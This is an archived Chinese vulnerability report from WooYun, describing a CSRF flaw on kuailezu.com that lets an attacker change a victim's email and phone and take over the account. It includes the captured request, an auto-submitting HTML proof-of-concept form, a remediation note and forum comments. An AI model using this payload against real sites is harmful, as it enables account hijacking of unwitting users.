当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023770

漏洞标题:猥琐流再次重置住哪网任意用户密码甚至霸占用户帐号

相关厂商:住哪网

漏洞作者: 带馅儿馒头

提交时间:2013-05-15 12:30

修复时间:2013-05-15 12:57

公开时间:2013-05-15 12:57

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-15: 细节已通知厂商并且等待厂商处理中
2013-05-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

药,切克闹!求礼物!!!

详细说明:

问题出在住哪旗下的快乐租网站,客官往下看:
1.注册一个用户并登录,发现可更改用户邮箱;

1.jpg


2.点击更改邮箱,这里未进行任何校验、甚至无操作验证码;

2.jpg


3.填入我们需要重置的邮箱提交并抓包,得到如下数据;

POST /user.php?m=member.setMemberEmail HTTP/1.1
Host: www.kuailezu.com
Proxy-Connection: keep-alive
Content-Length: 24
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.kuailezu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.kuailezu.com/user.php?m=member.info
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie:... 
email=2xxxxxxx%40qq.com


4.测试发现这里未校验referer,so,我们制作了以下POC;

<html>
<body>
<form id="mantou" name="mantou" action="http://www.kuailezu.com/user.php?m=member.setMemberEmail" method="POST">
<input type="hidden" name="email" value="2xxxxxx@qq.com" />
<input type="submit" value="submit" />
</form>
<script>
   document.mantou.submit();
</script>
</body>
</html>


5.运行POC的效果如下图;

10.jpg


6.运行POC之后,我们登录邮箱看到如下邮件;

3.jpg


7.点击邮件里的链接即可完成新邮箱的验证;

4.jpg


8.接下来,我们就可以直接使用该邮箱进行用户密码重置;

5.jpg


9.哈哈,邮箱收到密码重置链接咯;

6.jpg


10.重置密码完成后,可直接登录到住哪旗下任意网站;

8.jpg


11.各位客官可看到有个“更改手机号码”的功能,前面我们已经修改了用户的邮箱,如果能够再次修改用户的手机号码,岂不是直接霸占了用户的帐号,太邪恶了;

11.jpg


12.果然这里没有任何原始校验,我们直接填入手机号码,获取验证码,提交,搞定!!!

12.jpg


PS:写了这么多,求礼物呀!!!

漏洞证明:

见详细说明

修复方案:

敏感操作严格校验referer,
加入原始验证;

版权声明:转载请注明来源 带馅儿馒头@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-05-15 12:57

厂商回复:

这个漏洞是不成立

最新状态:

2013-05-15:感谢反馈,这里修改使用token+referer验证来防御CSRF漏洞。

漏洞评价:

评论

  1. 2013-05-15 13:07 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    厂商回复:这个漏洞是不成立我表示看了一会儿也没看懂,再看一遍~~

  2. 2013-05-15 13:08 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @小胖子 看完我咋感觉是“独角戏”呢?

  3. 2013-05-15 13:11 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    @leaf 什么叫独角戏?

  4. 2013-05-15 13:13 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)

    做个链接让人点不就行了

  5. 2013-05-15 13:13 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)

    @小胖子 你是我的粉丝

  6. 2013-05-15 13:14 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    厂商,我觉得你碉堡了,居然忽略了,这个是典型的CSRF啊,只是这小子没说清楚而已,密码找回流程还是有问题!!!!!@住哪网

  7. 2013-05-15 13:16 | 暗夜清风 ( 实习白帽子 | Rank:44 漏洞数:10 | 大哥,你的娃娃掉了.举手之劳,不必以身相许)

    不登陆别人账户还能搞?话说登录后还需要这个P吗?,小菜我没懂

  8. 2013-05-15 13:17 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    @小胖子 客官,你觉得哪里不清楚,我只能说厂商。。。。

  9. 2013-05-15 13:18 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)

    @小胖子 错了,是我是你的偶像

  10. 2013-05-15 13:19 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @暗夜清风 如果修改邮件地址页面没有referer验证也没有token的话,那在A.com域名下iframe一个POC,用户只要登录了住哪,并且浏览了这个被IFrame的页面,就执行了这个,然后就发送绑定邮件到新邮箱,通过重新认证的新邮箱再来找回密码最终劫持掉原来的用户账户,流程是这个样子的。

  11. 2013-05-15 13:20 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @带馅儿馒头 客官,你以后写详细点,私聊厂商赶紧修复吧,礼物神马的一个都不能少!哈哈

  12. 2013-05-15 13:20 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @ohmygod 戏弄屌丝智商?来信砍!!!

  13. 2013-05-15 13:20 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    @小胖子 小哥是个明白人

  14. 2013-05-15 13:23 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @带馅儿馒头 你这个的缺陷就是不能普遍攻击,针对性点对点攻击还可以,因为一个邮箱只能绑定一个账户。不过哪怕只有一个账户受害,那也是数据损失,也是安全风险,囧。

  15. 2013-05-15 13:24 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)

    @小胖子 。。。。。真的

  16. 2013-05-15 13:24 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    @小胖子 明白人,赞一个!

  17. 2013-05-15 13:26 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)

    @小胖子” "带馅儿馒头",这个听说是你的你的小号

  18. 2013-05-15 13:27 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    @ohmygod 你的简介很准确!

  19. 2013-05-15 13:27 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)

    "问题出在住哪旗下的快乐租网站,客官往下看"--客官“@带馅儿馒头 客官,你以后写详细点,私聊厂商赶紧修复吧,礼物神马的一个都不能少!哈哈"--客官

  20. 2013-05-15 13:28 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    @ohmygod 骚年,是还是太年轻了,什么@小胖子,@小瘦子,@大胖子,@大瘦子,@小胖胖要减肥,@心伤的胖子,@心伤的瘦子,所有胖跟瘦的都是我的马甲,不信我用马甲发一段一样的话给你看?

  21. 2013-05-15 13:28 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)

    @带馅儿馒头 你看,还说不是一个人

  22. 2013-05-15 13:29 | 带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:136 | 心在,梦在)

    @ohmygod 骚年,是还是太年轻了,什么@小胖子,@小瘦子,@大胖子,@大瘦子,@小胖胖要减肥,@心伤的胖子,@心伤的瘦子,所有胖跟瘦的都是我的马甲,不信我用马甲发一段一样的话给你看?

  23. 2013-05-15 13:29 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)

    @小胖子 不信

  24. 2013-05-15 13:33 | Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | IDC商)

    @ohmygod 骚年,是还是太年轻了,什么@小胖子,@小瘦子,@大胖子,@大瘦子,@小胖胖要减肥,@心伤的胖子,@心伤的瘦子,所有胖跟瘦的都是我的马甲,不信我用马甲发一段一样的话给你看?

  25. 2013-05-15 13:45 | 小胖胖要减肥 认证白帽子 ( 普通白帽子 | Rank:686 漏洞数:84 )

    @ohmygod 骚年,是还是太年轻了,什么@小胖子,@小瘦子,@大胖子,@大瘦子,@小胖胖要减肥,@心伤的胖子,@心伤的瘦子,所有胖跟瘦的都是我的马甲,不信我用马甲发一段一样的话给你看?

  26. 2013-05-15 14:02 | leaf ( 普通白帽子 | Rank:948 漏洞数:121 | 真的没影响么?)

    @带馅儿馒头 描述的时候用两个账户展现下就好了...

  27. 2013-05-15 14:06 | Tracker ( 路人 | Rank:16 漏洞数:4 | 厂商虐我千百遍,我待厂商如初恋!)

    @ohmygod 骚年,是还是太年轻了,什么@小胖子,@小瘦子,@大胖子,@大瘦子,@小胖胖要减肥,@心伤的胖子,@心伤的瘦子,所有胖跟瘦的都是我的马甲,不信我用马甲发一段一样的话给你看?

  28. 2013-05-15 15:50 | 小川 认证白帽子 ( 核心白帽子 | Rank:1344 漏洞数:208 | 一个致力要将乌云变成搞笑论坛的男人)

    看了半天我总觉得像是自己日自己

  29. 2013-05-15 18:44 | 邪少 ( 实习白帽子 | Rank:58 漏洞数:7 )

    @ohmygod 骚年,是还是太年轻了,什么@小胖子,@小瘦子,@大胖子,@大瘦子,@小胖胖要减肥,@心伤的胖子,@心伤的瘦子,所有胖跟瘦的都是我的马甲,不信我用马甲发一段一样的话给你看?

  30. 2013-05-16 07:56 | byniu ( 路人 | Rank:0 漏洞数:2 | 成功的两要素:一、坚持不要脸。二、大胆坚...)

    任何一个漏洞,只要找到思路,就是破坏力非常大的漏洞,网站的管理员觉得没影响~好吧,我受打击了~